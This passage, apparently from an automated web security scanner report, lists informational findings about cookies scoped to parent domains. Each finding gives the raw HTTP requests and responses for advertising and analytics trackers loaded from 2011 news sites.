Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=mq6XO9aFIYIiGA3sQhwSkaAc

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:08:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=D+sYO9aFHYIiGS8sQdwSkaIxSKMCdbdBwB; domain=advertising.com; expires=Tue, 03-Sep-2013 01:08:19 GMT; path=/
Set-Cookie: GUID=MTMxNTA5ODQ5OTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; domain=advertising.com; expires=Tue, 03-Sep-2013 01:08:19 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sun, 04 Sep 2011 02:08:19 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

13.41. http://load.exelator.com/load/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /load/?p=104&g=080&j=0&u=1234567&site=2222 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: TFF=eJxLtDK1qi62MjSyUjI0MHEwsDBwsLS0NFKyTrQysqrOtDK0BmJzA3MgZQBj1mKoNwSpN0ZTbwTFyPrM4dqI0wGkDUyINzs1IjUnsSSVOLNrAXTxQVw%253D; expires=Mon, 02-Jan-2012 01:13:04 GMT; path=/; domain=.exelator.com
Location: http://segments.adap.tv/data/?p=exelate&uid=1234567&sid=2222&ag=!!AGE!!&seg=
Content-Length: 0
Date: Sun, 04 Sep 2011 01:13:04 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-2


13.42. http://log.adap.tv/log

Summary

Severity:   Information
Confidence:   Certain
Host:   http://log.adap.tv
Path:   /log

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /log?event=videoView&adPlanId=4148&adaptag=&categories=sports&sessionId=25w4w9&nap=false&context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte+Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&height=225&htmlEnabled=true&key=cinesport&uid=-7050735172170286629&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&duration=&id=&url=&width=300&zid=&playHeadTime=0&as=3&viewNo=&serverRev=66573&playerRev=66583&eov=1315097086197 HTTP/1.1
Host: log.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: text/plain
Connection: Keep-Alive
Set-Cookie: asptvw1="ap4148%2C2%2C2011-09-03%2F18-44-50";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 03:01:57 GMT
Content-Length: 0


13.43. http://nmcharlotte.112.2o7.net/b/ss/nmcharlotte/1/H.20.3/s85129847696516

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nmcharlotte.112.2o7.net
Path:   /b/ss/nmcharlotte/1/H.20.3/s85129847696516

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/nmcharlotte/1/H.20.3/s85129847696516?AQB=1&ndh=1&t=3/8/2011%2019%3A45%3A22%206%20300&pageName=Story%3A%202577566%7CRaceday%26%2358%3B%20Danica%20already%20gone%26%2363%3B&g=http%3A//www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html&r=http%3A//www.google.com/trends/hottrends%3Fq%3Dsprint%26date%3D2011-9-3%26sa%3DX&cc=USD&ch=Charlotte%20Observer%3A%20Sports%20%7C%20*%20Sports%20Hold%20%7E%20Sports&server=charlotteobserver.com&events=event7&c1=http%3A//www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html&h1=CLT%7CCharlotte%20Observer%7CSports%7C%7C%7C%7C%7CSports%20%7C%20*%20Sports%20Hold%20%7E%20Sports&c2=1.0%7C&c3=*Story&v3=Cal%20Monthly%20Visit%20Number%3A%201&c4=charlotteobserver%7CManual%20Entry%7Cjutter@charlotteobserver.com%7C%26%238236%3BBy%20Jim%20Utter%26%238237%3B&v4=Story%3A%202577566%7CRaceday%26%2358%3B%20Danica%20already%20gone%26%2363%3B&c5=Unknown&c6=CLT%7CCharlotte%20Observer%7CSports%7C%7C%7C%7C%7CSports%20%7C%20*%20Sports%20Hold%20%7E%20Sports&c10=http%3A//www.charlotteobserver.com/2011/09/03/2577566_raceday-danica-already-gone.html&c13=Unknown&c20=GUID%3A%201583150943143157846%20%7C%20Story%3A%202577566%7CP%3A%20Charlotte%20Observer%3A%20Sports%20%7C%20*%20Sports%20Hold%20%7E%20Sports%20%3A%20charlotteobserver.com&c31=2011/09/03&c32=2011/09/03%20H20&c33=8%3A30PM&c34=Saturday&c37=237%7C2577566%7Chttp%3A//www.charlotteobserver.com/2011/09/03/2577566_raceday-danica-already-gone.html&c39=%20&c42=Cal%20Monthly%20Visit%20Number%3A%201&c43=Entry%20Page&c44=Entry%20Page&c48=NoTextAd%3A%20*Story%3Acharlotteobserver.com%3ASports%20%7C%20*%20Sports%20Hold%20%7E%20Sports&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: nmcharlotte.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 01:06:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_efhcjygdx7Fx7Fn=[CS]v4|27316788050129B3-4000010AC034C512|4E62C9FC[CE]; Expires=Fri, 2 Sep 2016 01:06:24 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 01:06:24 GMT
Last-Modified: Mon, 05 Sep 2011 01:06:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E62CF10-534D-7B222958"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
Location: http://b.scorecardresearch.com/r?c2=6035363&d.c=gif&d.o=nmcharlotte&d.x=245456460&d.t=page&d.u=http%3A%2F%2Fwww.charlotteobserver.com%2F2011%2F09%2F03%2F2577566%2Fraceday-danica-already-gone.html
xserver: www86
Content-Length: 0
Content-Type: text/plain


13.44. http://odb.outbrain.com/utils/get

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&settings=true&recs=true&widgetJSId=AR_2&key=AYQHSUWJ8576&idx=0&version=42206&ref=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX&apv=false&sig=rsi_seg&format=html&rand=88096 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1315097079013; Domain=outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="RifDljbBnUo="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sun, 30-Sep-2012 00:44:39 GMT; Path=/
Set-Cookie: _lvd2="a20VgmTZEaeQlaVAQ/tI3Q=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sat, 10-Sep-2011 13:32:39 GMT; Path=/
Set-Cookie: _rcc2="/RlY4kI4x+EC5hF25OSb5Q=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sun, 30-Sep-2012 00:44:39 GMT; Path=/
Set-Cookie: recs-1ac7243e27be1904dc4b28c0c3b41b7f="5sHw/4cdKR1RBwoxQ+NK56Gt39jPhS7BtAFn45s7nNxBJBStyd24vYRw03xty00LSHEMw5NUdblMWfcjIdzz7o0VClIcP3suYYfuX/vSYbkv2mx6/RuYBJJtD16TCm5FO5dLo73fEkx5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Sun, 04-Sep-2011 00:49:39 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:44:38 GMT
Content-Length: 15137

var ob_clbk=(typeof(OBR.extern)==='undefined')?outbrain:OBR.extern;ob_clbk.returnedHtmlData({"response":{"html":"\u003cdiv class\u003d\"ob_dual_container AR_2\"\u003e\n \u003cspan class\u003d\"ob_em
...[SNIP]...

13.45. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-15.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7102-15.js?cb=0.9818868087604642 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:00 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: nus_2046=0.00; expires=Mon, 05-Sep-2011 00:45:00 GMT; max-age=86400; path=/; domain=.rubiconproject.com
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:45:00 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 01:45:00 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=5032^2&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=112499; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3214998.js^1^1315097100^1315097100&3203911.js^1^1315097079^1315097079; expires=Sun, 11-Sep-2011 00:45:00 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1133

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3214998"
...[SNIP]...

13.46. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-2.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4462/5032; rdk15=0; ses15=5032^1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:17 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:45:17 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 01:45:17 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^2&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=112482; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2173

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

13.47. http://optimized-by.rubiconproject.com/a/6291/9346/15214-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6291/9346/15214-15.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6291/9346/15214-15.js?cb=0.6276808138936758&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=5032^1; rdk=6291/9346; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%265364%3D1%267751%3D1; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:05:03 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6291/9346; expires=Sun, 04-Sep-2011 02:05:03 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 02:05:03 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=5032^19&9346^3; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111296; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3203911.js^3^1315097079^1315098303&3225379.js^1^1315097102^1315097102&3164883.js^1^1315097102^1315097102&3214998.js^4^1315097100^1315097102; expires=Sun, 11-Sep-2011 01:05:03 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1915

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3203911"
...[SNIP]...

13.48. http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6291/9346/15214-2.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6291/9346/15214-2.js?cb=0.41656556632369757&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=5032^1; ses2=5032^1; csi2=3214995.js^1^1315096957^1315096957

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:01:27 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6291/9346; expires=Sun, 04-Sep-2011 02:01:27 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 02:01:27 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^28&9346^3; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111512; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3196491.js^2^1315097278^1315098087&3152805.js^1^1315097124^1315097124&224353.js^1^1315097124^1315097124&3220233.js^1^1315097119^1315097119&3222405.js^2^1315097118^1315097119&3164882.js^1^1315097118^1315097118&3214995.js^4^1315096957^1315097118; expires=Sun, 11-Sep-2011 01:01:27 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2067

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196491"
...[SNIP]...

13.49. http://p.brilig.com/contact/bct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/bct?pid=d6b47090-0a45-4cd9-8cf9-d1081a8879d8&_ct=pixel&REDIR=rt.legolas-media.com/lgrt?ci=1%26ti=12%26sti=28%26sts=1315096931625343%26sui=5ea31fa9-d42d-458f-9bb4-1700d69738c0 HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 00:53:15 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 00:53:15 GMT
Set-Cookie: BriligContact=5d4ee69c-99de-419c-8ef9-9d7e686b3586; Domain=.brilig.com; Expires=Tue, 27-Aug-2041 00:53:15 GMT
Location: http://rt.legolas-media.com/lgrt?ci=1&ti=12&sti=28&sts=1315096931625343&sui=5ea31fa9-d42d-458f-9bb4-1700d69738c0
Content-Length: 0
X-Brilig-D: D=2992
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Connection: close
Content-Type: text/plain


13.50. http://picasaweb.google.com/lh/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /lh/view

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lh/view HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Expires: Sun, 04 Sep 2011 01:23:13 GMT
Date: Sun, 04 Sep 2011 01:23:13 GMT
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Set-Cookie: S=izeitgeist-ad-metrics=t0E3hsRy46s:feedburner-control-panel=xLQwG_KvXxSf9t9O8zC_nw:photos_html=bnTyZwIf29xvOt4mQjEW6A; Domain=.google.com; Path=/; HttpOnly
Server: GSE
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"></meta>
<title>404 NOT_FOUND</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A
...[SNIP]...

13.51. http://pix04.revsci.net/A11149/a4/0/0/123.302

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /A11149/a4/0/0/123.302

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /A11149/a4/0/0/123.302?tgt=http%3A%2F%2Fsegments.adap.tv%2Fdata%2F%3Fp%3Daudiencescience%26type%3Dgif%26seg_id%3D%7Btrimsegs%7D%26add%3Dtrue HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=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; rsiPus_SQhO="MLtXrlMusS9rIAH3clmoJlAWvvGY5puCxew1nF+7KKCLIp00Q0d5+4d5FTJN4jWaW7ZHam54EN93XHnHy0rOylMjoJfpR8Ot/hdAS0oi5KMsVxP6pk60ZMcWicI3+tY5pZTOv5Ye+bO5vJziwOr5sQvsZMEna9myPmHrGexS7N4O52XbrX2OHdV2WE8wa4+Y6mYSng5ukBKpAbT3kl1kOcpkc14LJ+MrtSc5HR18lURkSrIbJb0inGWz9icdk6QiSpIZvCNR5/W8QjD5a5oobWvv91oYNaHqohX0SU9QceoEDdPUBYo751C4r5qQrxiWZUYDP4g="; rsi_us_1000000="pUMdJT+DPwIU1E3imYKC+OknDNarDzE9m/tXM2y5OlYSamN+F+xfdu44vAK1LW9qi2ENBLyeepZhpAoNnAZwwWk7okoNeM6hnY4FDeWNdjLp9DlTHNdGEjk0NgfVVxKB0vEnvngZcDTqBTlUIwh2pwKZacn4hm9cIGhFcXIXBU6SBmPbJnKmYxv/0p5EDN4nttB7hb1PTJwj/3mBGjNllA12sUjy7QOOdLxfEl6GmDjn/ZexM7I/fPI8ijGMSHLODmMGd6cbMIsOXjJJNoa5nJ+eMSF/OABhpFm4wTRoY4cV6nEhA+pPAPy1QsXwnrMI2Zr8YTxWbBFIuEKkLLkygAFgwReoUQA9386ahYRsIEOwLY1DxuNmCEA3ro/eDkCbAcvqEvEaCtehjMwNcehJlJKiT/DVk7YmgejB9LBYfaimbXWiFgHFLjhtiBdhR3QpExC/FZXGtZeYojPCKCYJk+UD2QwPJi0x4kB7qieRJB64L9qQZwSP3sZkJ0s95Evev44uttXviYp1xfQC7lDMqITkrFCcbAngqEdxGJfzn1K4jUovAh1xsgERtdrv5sDDDoP5l7x3v9OMyltap0D9DjeeI2xfPY3JHmgN3/CWnVJ63A+xxBghIzHc1IZiEqULnZ8XSyRBT0sY9Sei6BdID8JWlG406zH6X+6a+fgW0oipqwWFEsM5sQFrrGzszpRAm1Fs0XJgbBEUuIf0mSjMrOz9tB1anlpxt/RSHQozzS8XpqrHBXaDTF3WAjVith8T1kQ1rHVxp0K8xYCAYP4tXhXnOCkNDxOwu9yx2EwoZwPUwZVyA3VLxXvUyTVXxj91/H/aU76/1P6hCLxCrR/eIv22mWPYArDid/UvTXbwSjnYN/HMqJiU